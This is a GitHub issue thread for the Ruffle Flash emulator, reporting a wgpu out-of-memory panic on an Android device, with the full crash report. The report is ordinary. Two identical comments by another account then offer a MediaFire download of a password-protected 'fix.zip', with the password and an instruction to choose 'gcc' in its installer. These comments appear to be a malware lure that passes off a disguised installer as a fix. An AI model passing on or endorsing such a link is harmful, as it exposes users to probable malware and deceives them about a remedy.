### ISSUE TITLE
Error on https://play.cpjourney.net/

### ISSUE THREAD

**Issue by furippl3** [ruffle-rs/ruffle#17661]
# Error Info
Error name: Error
Error message: panicked at /home/runner/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:3411:5:
wgpu error: Validation Error

Caused by:
  In Device::create_buffer
    Not enough memory left.

Error stack:
```
Error: panicked at /home/runner/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:3411:5:
wgpu error: Validation Error

Caused by:
  In Device::create_buffer
    Not enough memory left.


    at n.wbg.__wbg_new_28c511d9baebfa89 (https://cdn.jsdelivr.net/npm/@ruffle-rs/ruffle@0.1.0-nightly.2024.8.9/core.ruffle.f97993efc99e6afe591f.js:1:80322)
    at ruffle_web.wasm.js_sys::Error::new::hc2592998c941ef19 (wasm://wasm/ruffle_web.wasm-031fb5b6:wasm-function[12686]:0x9864d1)
    at ruffle_web.wasm.core::ops::function::FnOnce::call_once{{vtable.shim}}::h39877c5ade5d9ce1 (wasm://wasm/ruffle_web.wasm-031fb5b6:wasm-function[9724]:0x910bee)
    at ruffle_web.wasm.std::panicking::rust_panic_with_hook::h47bd3d747ed79dc3 (wasm://wasm/ruffle_web.wasm-031fb5b6:wasm-function[6247]:0x802095)
    at ruffle_web.wasm.core::panicking::panic_fmt::hb859252f4b513814 (wasm://wasm/ruffle_web.wasm-031fb5b6:wasm-function[10138]:0x92e728)
    at ruffle_web.wasm.core::ops::function::Fn::call::h5e5de15be3c89217 (wasm://wasm/ruffle_web.wasm-031fb5b6:wasm-function[6543]:0x81fbca)
    at ruffle_web.wasm.<T as wgpu::context::DynContext>::device_create_buffer::h31b7a5f24338745e (wasm://wasm/ruffle_web.wasm-031fb5b6:wasm-function[7430]:0x867e06)
    at ruffle_web.wasm.<wgpu::Device as wgpu::util::device::DeviceExt>::create_buffer_init::h5e5349d452d1a092 (wasm://wasm/ruffle_web.wasm-031fb5b6:wasm-function[1859]:0x4ce8fc)
    at ruffle_web.wasm.core::cell::once::OnceCell<T>::try_init::h5ade303fc3f9ba69 (wasm://wasm/ruffle_web.wasm-031fb5b6:wasm-function[5203]:0x7a0a30)
    at ruffle_web.wasm.ruffle_render_wgpu::surface::Surface::draw_commands::h337b734913f7d3ef (wasm://wasm/ruffle_web.wasm-031fb5b6:wasm-function[876]:0x1a7e58)
```

# Player Info
Allows script access: true
Renderer: wgpu
Adapter Backend: Gl
Adapter Name: "Mali-G52"
Adapter Device Type: IntegratedGpu
Adapter Driver Name: ""
Adapter Driver Info: "WebGL 2.0 (OpenGL ES 3.0 Chromium)"
Enabled features: Features(TEXTURE_ADAPTER_SPECIFIC_FORMAT_FEATURES)
Available features: Features(DEPTH32FLOAT_STENCIL8 | TEXTURE_COMPRESSION_ETC2 | TEXTURE_COMPRESSION_ASTC | TEXTURE_COMPRESSION_ASTC_HDR | PUSH_CONSTANTS | CLEAR_TEXTURE)
Current limits: Limits { max_texture_dimension_1d: 4096, max_texture_dimension_2d: 4096, max_texture_dimension_3d: 16383, max_texture_array_layers: 256, max_bind_groups: 4, max_bindings_per_bind_group: 1000, max_dynamic_uniform_buffers_per_pipeline_layout: 8, max_dynamic_storage_buffers_per_pipeline_layout: 0, max_sampled_textures_per_shader_stage: 16, max_samplers_per_shader_stage: 16, max_storage_buffers_per_shader_stage: 0, max_storage_textures_per_shader_stage: 0, max_uniform_buffers_per_shader_stage: 11, max_uniform_buffer_binding_size: 65536, max_storage_buffer_binding_size: 0, max_vertex_buffers: 8, max_buffer_size: 268435456, max_vertex_attributes: 16, max_vertex_buffer_array_stride: 255, min_uniform_buffer_offset_alignment: 32, min_storage_buffer_offset_alignment: 256, max_inter_stage_shader_components: 124, max_color_attachments: 8, max_color_attachment_bytes_per_sample: 32, max_compute_workgroup_storage_size: 0, max_compute_invocations_per_workgroup: 0, max_compute_workgroup_size_x: 0, max_compute_workgroup_size_y: 0, max_compute_workgroup_size_z: 0, max_compute_workgroups_per_dimension: 0, min_subgroup_size: 0, max_subgroup_size: 0, max_push_constant_size: 0, max_non_sampler_bindings: 1000000 }
Surface quality: high
Surface samples: 4
Surface size: (550, 400, 1)

# Page Info
Page URL: https://play.cpjourney.net/
SWF URL: https://cdn.cpjourney.net/assets/media/flash/widgets/mission11/tracking.swf

# Browser Info
User Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Mobile Safari/537.36
Platform: Linux armv81
Has touch support: true

# Ruffle Info
Version: 0.1.0
Name: nightly 2024-08-09
Channel: nightly
Built: 2024-08-09T00:05:34.468Z
Commit: b9054c4f45240a46d1bc91659944b78c87a4348a
Is extension: false

# Metadata
width: 760
height: 480
frameRate: 12
numFrames: 1
swfVersion: 15
backgroundColor: #FFFFCC
isActionScript3: false
uncompressedLength: 81128

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
